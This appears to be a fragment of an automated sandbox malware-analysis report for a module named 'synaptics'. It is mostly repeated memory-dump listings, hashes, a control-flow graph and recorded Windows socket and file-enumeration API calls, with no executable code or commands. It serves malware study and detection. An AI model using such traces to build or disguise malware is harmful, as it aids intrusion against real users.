                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                                                                                    • Opcode ID: db325b5f8fc814197b8e39cd3e582e4dd98ecc7b9c6379424104e07725351d5c
                                                                                                                                                                                                                                    • Instruction ID: 35618798ff2984db3e10a422858982f57f89583669668725360cf31a9cfd671f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db325b5f8fc814197b8e39cd3e582e4dd98ecc7b9c6379424104e07725351d5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91115B717056103BE32166A45D0AFDB3629DF8631AF040836F704E6E81E7518C18D7E9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 644 6c693ce0-6c693cf8 645 6c693cff-6c693d06 644->645 646 6c693e48-6c693e51 645->646 647 6c693d0c-6c693d1f 645->647 648 6c693e52-6c693e5b 647->648 649 6c693d25-6c693d32 647->649 650 6c693d36-6c693d4e 649->650 652 6c693d91-6c693da1 650->652 653 6c693d50-6c693d67 650->653 654 6c693dab 652->654 655 6c693da3-6c693da9 652->655 658 6c693d6d-6c693d7d 653->658 659 6c693df0-6c693e2a 653->659 657 6c693db1-6c693dbf 654->657 655->657 661 6c693dc1-6c693dc4 657->661 662 6c693dc7-6c693dc9 657->662 668 6c693d89-6c693d8b 658->668 669 6c693d7f-6c693d86 658->669 678 6c693e2c-6c693e2f 659->678 679 6c693e32-6c693e35 659->679 661->662 664 6c693dcb-6c693de5 662->664 665 6c693e3d-6c693e40 662->665 664->648 670 6c693de7-6c693deb 664->670 665->646 671 6c693e42-6c693e45 665->671 668->659 672 6c693d8d 668->672 669->668 670->650 671->646 672->652 678->679 679->665 680 6c693e37-6c693e3a 679->680 680->665
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2118561607.000000006C691000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C691000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c691000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 064493eb77179cb9327ad4f1e7338b4309f210002dedb2ae2f003a67c68df4e8
                                                                                                                                                                                                                                    • Instruction ID: aa8456b7aa5275ba6a61861d9197272a8dcc61ab5fcfad2b40fbbb5b9b68f955
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 064493eb77179cb9327ad4f1e7338b4309f210002dedb2ae2f003a67c68df4e8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F4193756443029BC7009FA6DCC895B7BF4EB46368F040639FE5C83251D735AD1A8BAA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 6C7124BE
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 6C712512
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(6C86E4BC,000000E7), ref: 6C712522
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastgetsockoptsetsockopt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2137281509-0
                                                                                                                                                                                                                                    • Opcode ID: 35c78f6576b060b113d7d4b21724898af67496f43c985fae966878a449f39c9c
                                                                                                                                                                                                                                    • Instruction ID: f23e52431404cbd4c21958c1ba1e38ca2ba59589fff032bbfe81a4923b9de31b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35c78f6576b060b113d7d4b21724898af67496f43c985fae966878a449f39c9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B514F717893017AF6205B615D87FFB32596B46B08F08493AFB54BCDC1EBE4C50892BA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6C7CD27A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C7CD28B
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 6C7CD2A4
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?), ref: 6C7CD3A1
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?), ref: 6C7CD401
                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000000), ref: 6C7CD44F
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000002C,00000001,-00000254,00000100,00000000,00000000), ref: 6C7CD499
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
